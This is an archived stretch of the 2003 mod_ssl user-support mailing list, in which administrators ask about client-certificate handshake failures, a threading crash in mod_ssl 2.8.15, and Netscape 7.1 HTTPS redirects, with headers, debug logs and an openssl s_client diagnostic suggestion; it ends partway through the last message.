X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

testing subscription

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  1 16:25:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E1ED1A895F; Fri,  1 Aug 2003 16:25:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-nj04.iplex.ssmb.com (mail3.ssmb.com [199.67.141.129])
	by master.modssl.org (Postfix) with ESMTP id 3AF89A8933
	for ; Fri,  1 Aug 2003 16:25:01 +0200 (CEST)
Received: from imbarc-nj02.nj.ssmb.com (imbarc-nj02.nj.ssmb.com [150.110.177.216])
	by imbaspam-nj04.iplex.ssmb.com (8.12.10.Beta2/8.12.10.Beta2/SSMB_EXT/evision: 1.24 $) with ESMTP id h71EOtdi010179
	for ; Fri, 1 Aug 2003 10:24:56 -0400 (EDT)
Received: from mailhub-nj04-1.nj.ssmb.com (mailhub-nj04-2.nj.ssmb.com [150.110.236.237])
	by imbarc-nj02.nj.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h71EOsjv029312
	for ; Fri, 1 Aug 2003 10:24:54 -0400 (EDT)
Received: from exnjsm02.nam.nsroot.net (exnjsm02.nam.nsroot.net [150.110.188.173])
	by mailhub-nj04-1.nj.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id KAA13509
	for ; Fri, 1 Aug 2003 10:24:53 -0400 (EDT)
content-class: urn:content-classes:message
Subject: Handshake Failed
Date: Fri, 1 Aug 2003 10:24:46 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FE03@exchny43.ny.ssmb.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Handshake Failed
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
Thread-Index: AcNYOKf7XDNvpLIzT7axPab+2YOYZg==
From: "Nauman, Ahmed [IT]" 
To: 
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Please help on this issue with client authentication. I have made sure =
the client Issuer is in trusted CA list of server. All the certificates =
involved are correct, valid.
=20

ssl log
[info]  Connection to child 0 established (server =
cddfs1.nj.ssmb.com:443, client 199.67.140.20)
[info]  Seeding PRNG with 1160 bytes of entropy
[error] Certificate Verification: Error (20): unable to get local issuer =
certificate
[error] SSL handshake failed (server cddfs1.nj.ssmb.com:443, client =
199.67.140.20) (OpenSSL library error follows)
[error] OpenSSL: error:140890B2:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

error log
 Certificate Verification: Error (20): unable to get local issuer =
certificate
 SSL handshake failed (server wert.npo.dfssmfrb.com:443, client =
abc.def.140.20) (OpenSSL library error follows)
 OpenSSL: error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no =
certificate returned

Regards,
Nauman
_______________________________________________
Citibank N.A., 111 Wall St., New York, NY
Ph:   +1-212-657-1070 (w), +1-718-951-0508 (h)
Fax: +1-212-657-1645

Regards,
Nauman
_______________________________________________
Citibank N.A., 111 Wall St., New York, NY
Ph:   +1-212-657-1070 (w), +1-718-951-0508 (h)
Fax: +1-212-657-1645
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  4 19:37:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4CD62A8943; Mon,  4 Aug 2003 19:37:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay.macomnet.ru (relay.macomnet.ru [195.128.64.10])
	by master.modssl.org (Postfix) with ESMTP id 6EC00A8934
	for ; Mon,  4 Aug 2003 19:37:15 +0200 (CEST)
Received: from vdmitri (rhn-pm.imsys.ru [212.5.65.148] (may be forged))
	by relay.macomnet.ru (8.11.6/8.11.6) with SMTP id h74HbBw11458146
	for ; Mon, 4 Aug 2003 21:37:12 +0400 (MSD)
Message-ID: <008d01c35aaf$011a3fe0$3d01a8c0@vdmitri>
From: "Dmitri Dmitrienko" 
To: 
Subject: crash in mod_ssl 2.8.15
Date: Mon, 4 Aug 2003 21:36:57 +0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dmitri Dmitrienko" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

crash report:

environment:
mod_ssl 2.8.15, apache 1.3.28
platform: win32, win XP sp 1
compiler MS VC 6 sp 5
client IE 6
client Mozilla 1.3


steps to reproduce:
using IE 6 or Mozilla 1.3 open HTTP/SSL connectio to localhost.
get there any plain html page with some gifs and press refresh many times
while holding shift (full-refresh for IE or Ctrl-F5 for Mozilla).
crash happens everytime in 4-8 refreshes (in IE) or 30-40 for Mozilla.

call stack:
0: ap_ctx_get(ctx=0x6567616d, key="ssl::io::suck")
1: ssl_io_suck_read(ssl=0x0095b228, buf=0x008f4860, len=4096)
2: SSL_recvwithtimeout(fb=0x008f4810, buf=0x008f4860, len=4096)
3: ssl_io_hook_recvwithtimeout(fb=0x008f4810, buf=0x008f4860, len=4096)
4: ap_hook_call_func(0x00dade34->"p", 0x0086d1a0,
hf=0x0086ea88->{ssl_io_hook_recvwithtimeout, 0})

some noticed details:
a) buf contained a valid GET request:
GET /images/logo.gif HTTP/1.1
Accept: */*
Referer: https://localhost
Accept-Language:en-us
....

b) as it's clear from the call stack crash happened while trying to get ctx
for "ssl::io::suck" using r->ctx.
source line ssl_engine_io.c:267
r pointed to memory contained characted data: "ap::mod_log_config::log_x"
instead of any adequate request_rec.

c) actx (ssl_engine_io.c:261) contained proper ap_ctx list of two entries
{"ssl::request_rec",0x95d8d0}{"ssl::verify::depth", 1}{NULL,0}

d) beside this one, there are 3 other threads that were in
SSL_recvwithtimeout() function call.

possible reasons for the crash:
1) memory corrpution
2) races between threads

If you need any further info, please contact me by email.

best regards,
dmitri.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  5 10:45:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E626FA8943; Tue,  5 Aug 2003 10:45:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id D2F9EA8933
	for ; Tue,  5 Aug 2003 10:45:09 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h758j6Mm028330 for ; Tue, 5 Aug 2003 16:45:07 +0800 (CST)
Message-ID: <001501c35b2c$9e47cc60$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: Browser specific OpenSSL mod_ssl problem !
Date: Tue, 5 Aug 2003 04:36:06 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All.
Help. Netscape is driving me to drinks!
Problem : Netscape 7.1 will not "redirect" from http://my.first.dom to
https://my.secure.dom, claims it is transmitting in clear text (rather than
encrypted).

Objective : from first web-site, create a linik to a secure web-site inside
index.html using an anchor e.g. ClickMe

Set up : Apache2 httpd + mod_ssl + Tomcat + Oracle. Tomcat holds java
servlets. Apache server has applets communicating with servlets.

What works : Everything works just fine using W98+MSIE5 or W98+Netscape6.2
or Linux+Mozilla.

What doesn't work : Using Netscape 7.1, When I key in the URL
"my.first.dom", it takes me to the web-site. When I click on the link to
"my.secure.dom", which does indeed take me to the secure site, it presents
the logon screen and the certificate. I logged on and accepted the
certificate. Normally in Netscape 6.2, the tiny lock located in bottom right
side of screen should be closed and shows the certificate when I click on
it. But in 7.1, the lock is NOT CLOSED and it says that the transmission is
in clear text for all to see.
However, if I key in the URL : https://my.secure.dom, the little lock closes
and shows the certificate.
...
[code]
(httpd.conf)
...
Listen 192.168.100.1:80
Listen 443
NameVirtualHost 192.168.100.1

ServerName my.first dom
...

# I added following redirect in the hope Netscape7.1 would work - didn't!

Server my.secure.dom
Redirect /index.html https://my.secure.dom/index.html

# as far as MSIE5 and Mozilla are concerned, they only need the following
lines to work properly

ServerName my.secure.dom
...
    ... blablabla 
...

[/code]


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  5 11:35:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EAA0AA8969; Tue,  5 Aug 2003 11:35:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 63E38A8937
	for ; Tue,  5 Aug 2003 11:35:11 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h759Z8nk017758 for ; Tue, 5 Aug 2003 17:35:09 +0800 (CST)
Message-ID: <000501c35b33$9b85c200$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: Any tools to test https+mod_ssl ???
Date: Tue, 5 Aug 2003 05:26:08 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All.
Further to my earlier comments that httpd + mod_ssl seems to be ignored by
Netscape 7.1
After logging-in and accepting the certificate, 7.1's liitle lock remains
open and says I am transmitting in clear text.
Yet Netscape 6.2, MSIE5 and Mozilla all accepted the certificate and they
say the transmission is encrypted.
Are there any tools available to test the transmission ???
Cheers.
:-)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  5 11:39:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2F027A8943; Tue,  5 Aug 2003 11:39:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hitpro.hitachi.co.jp (hitpro.hitachi.co.jp [133.145.224.7])
	by master.modssl.org (Postfix) with ESMTP id 6564AA8933
	for ; Tue,  5 Aug 2003 11:39:35 +0200 (CEST)
Received: from mc3.mcg.hitachi.co.jp by hitpro.hitachi.co.jp (8.12.9/eHI-hitpro) id h759dMke026573; Tue, 5 Aug 2003 18:39:22 +0900 (JST)
Received: (from root@localhost)
	by mc3.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h759dLr07548
	for ; Tue, 5 Aug 2003 18:39:21 +0900 (JST)
Received: from unknown [192.168.2.1] by mc3.mcg.hitachi.co.jp with SMTP id UAA07542 ; Tue, 5 Aug 2003 18:39:21 +0900
Received: from navsg4.hitachi.co.jp by navsg4.hitachi.co.jp (8.9.3/3.7W-navsg4) id SAA13734; Tue, 5 Aug 2003 18:39:20 +0900 (JST)
Received: from mlsv4.itg.hitachi.co.jp ([158.213.165.103])
 by navsg4.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003080518391908624
 ; Tue, 05 Aug 2003 18:39:19 +0900
Received: from navgw6.itg.hitachi.co.jp by mlsv4.itg.hitachi.co.jp (8.12.6/8.12.6) id h759dFx0031778; Tue, 5 Aug 2003 18:39:19 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw6.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003080518391914155
 ; Tue, 05 Aug 2003 18:39:19 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id SAA26855;
	Tue, 5 Aug 2003 18:39:19 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h759dJo22400;
	Tue, 5 Aug 2003 18:39:19 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Tue, 05 Aug 2003 18:38:59 +0900 (JST)
Message-Id: <20030805.183859.41670778.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, achana@saysit.com.hk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: Any tools to test https+mod_ssl ???
From: Kiyoshi Watanabe 
In-Reply-To: <000501c35b33$9b85c200$0200a8c0@com>
References: <000501c35b33$9b85c200$0200a8c0@com>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi I think that the following may help you.

openssl s_client -connect localhost:443 -state -debug

Please Refer to the FAQ in detail (www.modssl.org)

-Kiyoshi
Kiyoshi Watanabe



> Hi All.
> Further to my earlier comments that httpd + mod_ssl seems to be ignored by
> Netscape 7.1
> After logging-in and accepting the certificate, 7.1's liitle lock remains
> open and says I am transmitting in clear text.
> Yet Netscape 6.2, MSIE5 and Mozilla all accepted the certificate and they
> say the transmission is encrypted.
> Are there any tools available to test the transmission ???
> Cheers.
> :-)
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  5 19:32:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A69AFA8943; Tue,  5 Aug 2003 19:32:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bender.bawue.de (bender.bawue.de [193.197.13.1])
	by master.modssl.org (Postfix) with ESMTP id 4965CA8933
	for ; Tue,  5 Aug 2003 19:32:50 +0200 (CEST)
Received: from my.bawue.de (bender.bawue.de [193.197.13.1])
	by bender.bawue.de (Postfix) with ESMTP id 859741B7FC
	for ; Tue,  5 Aug 2003 19:32:44 +0200 (MEST)
Received: from 192.6.76.72
        (SquirrelMail authenticated user haen)
        by my.bawue.de with HTTP;
        Tue, 5 Aug 2003 19:32:45 +0200 (MEST)
Message-ID: <38932.192.6.76.72.1060104765.squirrel@my.bawue.de>
Date: Tue, 5 Aug 2003 19:32:45 +0200 (MEST)
Subject: Certificate verification problem (required client certificate)
From: "Herbert Neugebauer" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.0
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Herbert Neugebauer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm having a strange problem with Apache 2.0.45 / openssl 0.9.6 (and
possibly tomcat 4.1.27).

The web-server should run all applications only over SSL and with client
certificate verification enabled.

So I set up all the necessary configuration, including server and client
certificates (our company has it's own internal CA), and moved three
different applications from the non-SSL to the SSL virtual-host.
Everything works fine, the applications can access the "environment
variables", where the user-ID coming from the certificate is stored, in
order to authenticate the users and provide user-specific content.

However the 4th application doesn't work. One of the working applications
is PHP, another also working application is JSP based, so using Tomcat.

The fourth application is not JSP, but a Servlet/Applet combination.

What happens when accessing the page is that the "index.html" downloads to
the client, but then the applet should be retrieved by the browser (IE),
but the JAVA Plug-In just says "applet not found", and in the web-server
error file (put in INFO) I see the following errors.:

[Tue Aug 05 18:56:52 2003] [info] Connection to child 4 established
(server esds
v07.bbn.hp.com:443, client 15.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 18:56:52 2003] [info] SSL library error 1 in handshake (server
esdsv
07.bbn.hp.com:443, client 15.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] SSL Library Error: 336105671
error:140890C7:SS
L routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
No CAs
known to server for verification?
[Tue Aug 05 18:56:52 2003] [info] Connection to child 4 closed with
abortive shu
tdown(server esdsv07.bbn.hp.com:443, client 15.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] Connection to child 69 established
(server esd
sv07.bbn.hp.com:443, client 15.136.126.30)
[Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 18:56:53 2003] [info] SSL library error 1 in handshake (server
esdsv
07.bbn.hp.com:443, client 15.136.126.30)
[Tue Aug 05 18:56:53 2003] [info] SSL Library Error: 336105671
error:140890C7:SS
L routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
No CAs
known to server for verification?
[Tue Aug 05 18:56:53 2003] [info] Connection to child 69 closed with
abortive sh
utdown(server esdsv07.bbn.hp.com:443, client 15.136.126.30)


I know, normally this "peer did not return a certificate" indicates that
either my browser does not have a certificate (which it has) or that the
certificate can not be verified by the server due to a missing CA
certificate (which it has). If one of these or both problems were there,
the other three applications would not work as well, but they do!

Now I was wondering if it could be an issue somewhere inbetween mod_ssl,
mod_jk, Tomcat??

In principal the connector between Apache and Tomcat works, otherwise the
JSP application would not work as well. That can be easily verified by
inserting a bug in this configuration and voila, the JSP app stops
working.

Any ideas?

   thanks in advance

        Herbert

PS: if I switch on debug level, I get even more info, which does not help
me, but it first says something about client certificate A (success) and
then something about a certificate B????? what is this about?

[Tue Aug 05 19:14:46 2003] [info] Loading certificate & private key of
SSL-aware
 server
[Tue Aug 05 19:14:46 2003] [info] Init: Requesting pass phrase from dialog
filte
r program (/opt/hpws/apache/conf/passPhrase.dialog)
[Tue Aug 05 19:14:46 2003] [debug] ssl_engine_pphrase.c(499): encrypted
RSA priv
ate key - pass phrase requested
[Tue Aug 05 19:14:48 2003] [info] Configuring server for SSL protocol
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(436): Creating new
SSL cont
ext (protocols: SSLv2, SSLv3, TLSv1)
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(553): Configuring
client au
thentication
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(1096): CA
certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
Primary Class 2 Certification Authority
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(611): Configuring
permitted
 SSL ciphers [!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(739): Configuring RSA
serve
r certificate
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(778): Configuring RSA
serve
r private key
[Tue Aug 05 19:14:49 2003] [info] Loading certificate & private key of
SSL-aware
 server
[Tue Aug 05 19:14:49 2003] [info] esdsv07.my.com:443 reusing existing RSA pr
ivate key on restart
[Tue Aug 05 19:14:51 2003] [info] Configuring server for SSL protocol
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(436): Creating new
SSL cont
ext (protocols: SSLv2, SSLv3, TLSv1)
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(553): Configuring
client au
thentication
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(1096): CA
certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
Primary Class 2 Certification Authority
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(611): Configuring
permitted
 SSL ciphers [!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(739): Configuring RSA
serve
r certificate
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(778): Configuring RSA
serve
r private key
[Tue Aug 05 19:15:02 2003] [info] Connection to child 64 established
(server esd
sv07.bbn.hp.com:443, client 15.136.126.30)
[Tue Aug 05 19:15:02 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1764): OpenSSL:
Handshake
: start
[Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: bef
ore/accept initialization


[---lots of stuff omitted, including the verificate of my certificate---]


[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 read finished A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 write change cipher spec A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 write finished A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 flush data
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(708): inside
shmcb_store_s
ession
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(714):
session_id[0]=106, m
asked index=10
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1089): entering
shmcb_inse
rt_encoded_session, *queue->pos_count = 0
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1013): entering
shmcb_expi
re_division
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1145): we have 14386
bytes
 and 133 indexes free - enough
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1174): storing in
index 0,
 at offset 0
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1189):
session_id[0]=106,
idx->s_id2=63
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1200): leaving now
with 11
28 bytes in the cache and 1 indexes
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1204): leaving
shmcb_inser
t_encoded_session
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(742): leaving
shmcb_store
successfully
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(437): shmcb_store
successf
ul
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1610):
Inter-Process Sess
ion Cache: request=SET status=OK
id=6A3F782DD6F051D3FFBFDFC9AD3197731D1008BF6C16
089DB3EF2B1875772849 timeout=296s (session caching)
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1768): OpenSSL:
Handshake


[--- another and another successful handshake following ---]

[--- even more stuff omitted, then something strange: ---]
[Tue Aug 05 19:15:13 2003] [info] Connection to child 1 established
(server esds
v07.bbn.hp.com:443, client 15.191.1.8)
[Tue Aug 05 19:15:13 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1764): OpenSSL:
Handshake
: start
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: bef
ore/accept initialization
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
11/11 by
tes from BIO#40239088 [mem: 403f1568] (BIO dump follows)
[--bio dump left out--]
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 read client hello A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 write server hello A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 write certificate A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 write certificate request A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSL
v3 flush data
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
5/5 byte
s from BIO#40239088 [mem: 403f1568] (BIO dump follows)
[--another bio dump left out--]
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1782): OpenSSL:
Write: SS
Lv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
Exit: err
or in SSLv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
Exit: err
or in SSLv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [info] SSL library error 1 in handshake (server
esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 19:15:14 2003] [info] SSL Library Error: 336105671
error:140890C7:SS
L routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
No CAs
known to server for verification?
[Tue Aug 05 19:15:14 2003] [info] Connection to child 1 closed with
abortive shu
tdown(server esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 19:15:14 2003] [info] Connection to child 66 established
(server esdsv07.my.com:443, client 115.136.126.30)



It started with read/writen client certificate A, no error, then suddenly
says something about client certificate B, which fails. What is client
certificate B?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  7 11:19:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 38BC8A8942; Thu,  7 Aug 2003 11:19:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id DF09DA8933
	for ; Thu,  7 Aug 2003 11:19:41 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h779JNRm028813 for ; Thu, 7 Aug 2003 17:19:24 +0800 (CST)
Message-ID: <002901c35cc3$b492bf00$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <000501c35b33$9b85c200$0200a8c0@com> <20030805.183859.41670778.kiyoshi@bisd.hitachi.co.jp>
Subject: SSL throws SSL23_GET_SERVER_HELLO error
Date: Thu, 7 Aug 2003 05:10:09 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All.
When I run the  following line command :
[ssl] # openssl s_client -connect localhost:443 -state -debug
I get this error message :
...
SSL_connect:error in SSLv2/v3 read server hello A
1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
